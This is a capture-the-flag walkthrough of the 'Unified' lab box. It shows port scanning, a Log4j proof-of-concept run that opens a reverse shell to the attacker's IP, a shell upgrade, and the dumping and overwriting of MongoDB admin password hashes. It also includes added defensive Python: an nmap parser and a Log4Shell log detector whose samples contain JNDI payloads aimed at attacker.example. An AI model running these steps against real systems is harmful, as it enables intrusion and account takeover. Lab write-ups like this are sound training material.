Unified
Summary
Part of Starting Point's Tier 2 boxes, Unified revolves around exploiting the Log4j vulnerability. Securing the initial foothold entails identifying the application's version through meticulous enumeration of the web server. Subsequently, leveraging a readily available PoC allows us to gain access to the application using the administrator account. Further reconnaissance within the site exposes plaintext SSH credentials, allowing us to root the box.
Step 1: Web server enumeration (Browser): Web app's version
Step 2: Researching (Browser): Log4j vulnerability &
Step 3: Using: Foothold
Step 5: Web server enumeration (Browser): Privilege escalation
Recon
Port Scan
As always, let's start with a port scan. For efficiency, we will first run a fast (-T5 --min-rate 10000) all-ports (-p-) scan to find out which of them are open (-open), and then we will do version scanning (-sV) and run Nmap's default scripts (-sC) against the open ports only.
# Scanning all ports at maximum speed
$ sudo nmap 10.129.158.126 -T5 --min-rate 10000 -open -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 17:37 BST
Nmap scan report for 10.129.158.126
Host is up (0.038s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6789/tcp open ibm-db2-admin
8080/tcp open http-proxy
8443/tcp open https-alt
8843/tcp open unknown
8880/tcp open cddbp-alt
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
# Version-scanning the specified ports at max speed plus using default scripts
$ sudo nmap 10.129.158.126 -T5 --min-rate 10000 -p 22,6789,8080,8443,8843,8880 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3
<SNIP>
6789/tcp open ibm-db2-admin?
8080/tcp open http-proxy
|_http-title: Did not follow redirect to https://10.129.158.126:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
<SNIP>
8443/tcp open ssl/nagios-nsca Nagios NSCA
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after: 2024-04-03T21:37:24
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
8843/tcp open ssl/unknown
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
<SNIP>
8880/tcp open cddbp-alt?
Based on Nmap's output, we can note some things down:
- There is an SSH port open (22) which might represent the way to access the box.
- There is an HTTP port (8080) which redirects to https://10.129.158.126:8443/manage, which seems interesting.
- Port 6789 seems to be used for an application called UniFi Mobile Speed Test.
- The last port (8880) is related to a protocol called CDDB and is also related to the UniFi Network.
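Reading the two scans by hand works for six ports, but the same notes (which ports are open, which service names Nmap only guessed, and where HTTP redirects point) can be pulled out of the normal-format output mechanically. The following Python is an added example and not part of the original writeup; its input is a trimmed copy of the -sC -sV output above, embedded as a constructed string.

```python
import re
from typing import Dict, List

# Constructed sample input: a trimmed copy of the -sC -sV output quoted earlier on this page.
SAMPLE_NMAP = """\
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
|_http-title: Did not follow redirect to https://10.129.158.126:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
8443/tcp open  ssl/nagios-nsca Nagios NSCA
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc.
|_Not valid after: 2024-04-03T21:37:24
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
8880/tcp open  cddbp-alt?
"""

# "PORT/PROTO STATE SERVICE [VERSION]" rows; a trailing "?" on SERVICE means Nmap guessed it.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# NSE script output lines: "| name: text" or "|_name: text" (the "_" marks the last line).
SCRIPT_RE = re.compile(r"^\|_?\s?(.*)$")
REDIRECT_RE = re.compile(r"redirect to (https?://\S+)", re.IGNORECASE)


def parse_nmap(text: str) -> List[Dict]:
    """Turn normal-format Nmap output into one record per port, with its script lines attached."""
    services: List[Dict] = []
    current = None
    for line in text.splitlines():
        line = line.rstrip()
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = {
                "port": int(port),
                "proto": proto,
                "state": state,
                "service": service.rstrip("?"),
                "guessed": service.endswith("?"),   # e.g. "ibm-db2-admin?" is a fingerprint guess
                "version": version or "",
                "scripts": [],
            }
            services.append(current)
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            current["scripts"].append(m.group(1))
    return services


def open_ports(services: List[Dict]) -> List[int]:
    return [s["port"] for s in services if s["state"] == "open"]


def guessed_services(services: List[Dict]) -> List[int]:
    """Ports whose service name Nmap could not confirm; these deserve manual verification."""
    return [s["port"] for s in services if s["guessed"]]


def find_redirects(services: List[Dict]) -> Dict[int, str]:
    """Map each port whose http-title script reports a redirect to the target URL."""
    redirects: Dict[int, str] = {}
    for svc in services:
        for script_line in svc["scripts"]:
            m = REDIRECT_RE.search(script_line)
            if m:
                redirects[svc["port"]] = m.group(1)
    return redirects


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_NMAP)
    print("open ports:", open_ports(parsed))
    print("guessed services:", guessed_services(parsed))
    print("redirects:", find_redirects(parsed))
```

The "guessed" flag is the part worth keeping an eye on: 6789 and 8880 are only fingerprint guesses (hence the "?"), which is why the writeup has to fall back to research rather than trust the service names.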
Web Server Enumeration
By visiting the redirected URL we found above, we land on the UniFi login page, which also includes its version: 6.4.54 (Figure 1).

Foothold
Log4j
Since we know the application's version, we can check if any known vulnerability exists. Doing so reveals the Log4j vulnerability (Figure 2.1) as well as a GitHub repository with a PoC (Figure 2.2).

The SprocketSecurity article includes both an exploitation and a post-exploitation route, but let's first try the PoC as it involves fewer steps. By opening a listener (Figure 3.1) and following the PoC's execution instructions (Figure 3.2), we indeed achieve and secure our foothold (Figure 3.3).
# executing the PoC
sudo python3 exploit.py -u https://10.129.96.149:8443 -i 10.10.14.147 -p 1337
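From the defender's side, the Log4j weakness used here is detected by looking for JNDI lookup strings in request logs, including the nested and URL-encoded forms that slip past a plain substring match. The following Python is an added example, not part of the original writeup or of the PoC repository it references; the log lines and the attacker.example host are constructed, and the lookup-folding rules cover only the lower/upper/default-value forms shown in the sample.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not taken from the box): a benign request, a plain JNDI lookup,
# a nested/obfuscated lookup, and a URL-encoded lookup. "attacker.example" is a placeholder host.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /manage/account/login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "POST /api/login HTTP/1.1" 400 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://attacker.example/x}"',
    '10.0.0.8 - - "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fy%7D HTTP/1.1" 200 "curl/8.0"',
]

# An innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would before reaching the JNDI lookup."""
    body = match.group(1)
    if body.lower().lstrip().startswith("jndi:"):
        return match.group(0)             # keep the JNDI lookup itself so it can be flagged
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                      # default-value form "${name:-default}", e.g. "${::-j}"
        return body.split(":-", 1)[1]
    return match.group(0)                 # unknown lookup: leave it alone


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then repeatedly fold nested lookups inside-out until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        folded = LOOKUP_RE.sub(_resolve, text)
        if folded == text:
            break
        text = folded
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the line contains a JNDI lookup after de-obfuscation."""
    return JNDI_RE.search(normalize(line)) is not None


def scan(lines):
    """Indices of log lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LOGS):
        print(f"line {i}: {normalize(SAMPLE_LOGS[i])}")
```

Folding the lookups before matching matters because Log4j evaluates them inside-out, so a filter that only searches for the literal text "${jndi:" misses the third sample line while the vulnerable controller still resolves it. The real fix is the version upgrade (or removing the JndiLookup class); the detector only tells you whether anyone has been probing.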

Shell Upgrade
Before searching for the flag, we can first upgrade our shell (Figure 4).
# Checking if script is available
which script
# Spawning the bash shell
script /dev/null -c /bin/bash
# Backgrounding the shell (CTRL+Z)
^Z
# Checking the configurations of our local shell
echo $TERM && stty size
# Disabling echo, passing I/O straight through, and foregrounding the shell
stty raw -echo; fg
# Setting the terminal dimensions (use the values reported by stty size above)
stty rows 51 cols 209
# Exporting the terminal type
export TERM=xterm

We can now read the user.txt flag within the home directory of the sole user of the box.
# Checking users
unifi@unified:/unifi/data$ ls /home
michael
# Reading the user flag
unifi@unified:/unifi/data$ cat /home/michael/user.txt
6ce<REDACTED>127
Privilege Escalation
MongoDB Exploitation
The post-exploitation part of the article refers to a MongoDB instance from which we can dump password hashes. Let's check if we can do that (Figure 5).
# Dumping the password hashes
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

Next, according to the article, we can generate a new password hash (Figure 6.1) and use it to change the administrator's password (Figure 6.2), so we can then use it to log in to the UniFi portal as a privileged user (Figure 7).
# Hashing the new password (SHA-512 crypt)
mkpasswd -m sha-512 Password123!
# Changing the administrator's password
mongo --port 27117 ace --eval 'db.admin.update({"_id" : ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$Zpy/bK4oaMXbjkwG$gPVsT76.dDkLpzgvEZm39v2kvkqfytwFzuzOHOW5MmkgFtN9UXDbg0FZ58hckZEq2g83mE9bWNqXDi6itVvd91"}})'

UniFi Enumeration
By enumerating the UniFi portal, we can find the root user's plaintext password (Figure 8), which we can use right away to read the root.txt flag 🚩 (Figure 9).